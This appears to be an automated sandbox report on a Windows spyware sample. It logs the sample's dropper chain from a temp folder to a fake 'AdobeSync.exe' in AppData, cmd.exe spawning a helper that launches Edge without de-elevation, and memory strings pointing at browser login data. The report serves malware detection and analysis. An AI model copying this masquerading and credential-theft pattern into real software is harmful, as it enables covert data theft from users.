Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D3752552_2_6D375255
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_000D76103_2_000D7610
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: String function: 008A0237 appears 683 times
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: String function: 00861F13 appears 54 times
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: String function: 008A32F3 appears 83 times
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: String function: 00863821 appears 501 times
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: String function: 008A0726 appears 34 times
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: String function: 00084080 appears 32 times
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: String function: 000B8490 appears 423 times
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: String function: 00065A10 appears 67 times
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: String function: 00105F10 appears 43 times
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: String function: 00066970 appears 43 times
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: String function: 00600726 appears 34 times
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: String function: 005C3821 appears 501 times
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: String function: 6D370F70 appears 47 times
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: String function: 006032F3 appears 85 times
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: String function: 005C1F13 appears 54 times
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: String function: 00600237 appears 683 times
Source: LocalCtrl_alpha_v3.exe.5.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
Source: eekxwchdkwfcah.5.drStatic PE information: Number of sections : 12 > 10
Source: bkpxojga.11.drStatic PE information: Number of sections : 12 > 10
Source: LVkAi4PBv6.exe, 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegallon.exe4 vs LVkAi4PBv6.exe
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite.dllX vs LVkAi4PBv6.exe
Source: LVkAi4PBv6.exe, 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamegallon.exe4 vs LVkAi4PBv6.exe
Source: LVkAi4PBv6.exe, 00000002.00000002.1366806926.000000006D39D000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameSharePoint.dllF vs LVkAi4PBv6.exe
Source: LVkAi4PBv6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: classification engineClassification label: mal100.spyw.evad.winEXE@64/276@22/15
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0089FE21 FormatMessageW,GetLastError,LocalFree,0_2_0089FE21
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008645EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,0_2_008645EE
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005C45EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,2_2_005C45EE
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008A304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,0_2_008A304F
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D367F40 LoadResource,LockResource,SizeofResource,2_2_6D367F40
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00886B88 ChangeServiceConfigW,GetLastError,0_2_00886B88
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeFile created: C:\Users\user\AppData\Roaming\PatchReaderWCFJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4236:120:WilError_03
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\Jump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: cabinet.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: msi.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: version.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: wininet.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: comres.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: clbcatq.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: msasn1.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: crypt32.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: feclient.dll0_2_00861070
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCommand line argument: cabinet.dll0_2_00861070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: cabinet.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: msi.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: version.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: wininet.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: comres.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: clbcatq.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: msasn1.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: crypt32.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: feclient.dll2_2_005C1070
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCommand line argument: cabinet.dll2_2_005C1070
Source: LVkAi4PBv6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSystem information queried: HandleInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: LVkAi4PBv6.exe, 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: SELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmp;.\\?\\\?\UNC\\\invalid string position\ *AI_WSP_LISTAI_WSP_FEATURES_LIST[AI_WSP_URL]AI_SHAREPOINT_LOGAI_GLOBAL_WSPAI_LOCAL_WSPAI_NOT_VITAL_WSPAI_DEPLOY_WSP_CADATAAI_DEPLOY_WSP_CADATA_64AI_SHAREPOINT_STRINGS,|$^.cab.wspSharePoint.log-url [AI_WSP_URL] -allcontenturls-immediate-time-local-allowgacdeployment-allowcaspolicies-force-idSPAdminSPAdminV4SPTimerV3SPTimerV4
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000003.1384998167.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394261032.000000006D303000.00000002.00000001.01000000.0000000B.sdmp, AdobeSync.exe, 00000004.00000002.1459672838.000000006D4D3000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000003.1384998167.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394261032.000000006D303000.00000002.00000001.01000000.0000000B.sdmp, AdobeSync.exe, 00000004.00000002.1459672838.000000006D4D3000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000003.1384998167.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394261032.000000006D303000.00000002.00000001.01000000.0000000B.sdmp, AdobeSync.exe, 00000004.00000002.1459672838.000000006D4D3000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000003.1384998167.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394261032.000000006D303000.00000002.00000001.01000000.0000000B.sdmp, AdobeSync.exe, 00000004.00000002.1459672838.000000006D4D3000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: INSERT INTO reporting_endpoints (nik, origin_scheme, origin_host, origin_port, group_name, url, priority, weight) VALUES (?,?,?,?,?,?,?,?)5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47X8
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000003.1384998167.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394261032.000000006D303000.00000002.00000001.01000000.0000000B.sdmp, AdobeSync.exe, 00000004.00000002.1459672838.000000006D4D3000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E17000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1887495484.0000000002E8F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: LVkAi4PBv6.exe, 00000002.00000003.1361979813.0000000001475000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000003.1384998167.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394261032.000000006D303000.00000002.00000001.01000000.0000000B.sdmp, AdobeSync.exe, 00000004.00000002.1459672838.000000006D4D3000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: LVkAi4PBv6.exeReversingLabs: Detection: 23%
Source: LVkAi4PBv6.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: LVkAi4PBv6.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeFile read: C:\Users\user\Desktop\LVkAi4PBv6.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\LVkAi4PBv6.exe "C:\Users\user\Desktop\LVkAi4PBv6.exe"
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeProcess created: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe "C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe" -burn.clean.room="C:\Users\user\Desktop\LVkAi4PBv6.exe" -burn.filehandle.attached=528 -burn.filehandle.self=552
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeProcess created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeProcess created: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe "C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe"
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,10255780505562275753,1680696743736403,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7160 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7316 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7156 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeProcess created: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe "C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe" -burn.clean.room="C:\Users\user\Desktop\LVkAi4PBv6.exe" -burn.filehandle.attached=528 -burn.filehandle.self=552 Jump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeProcess created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeProcess created: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,10255780505562275753,1680696743736403,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7160 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7316 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7156 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeSection loaded: feclient.dllJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: msxml3.dllJump to behavior
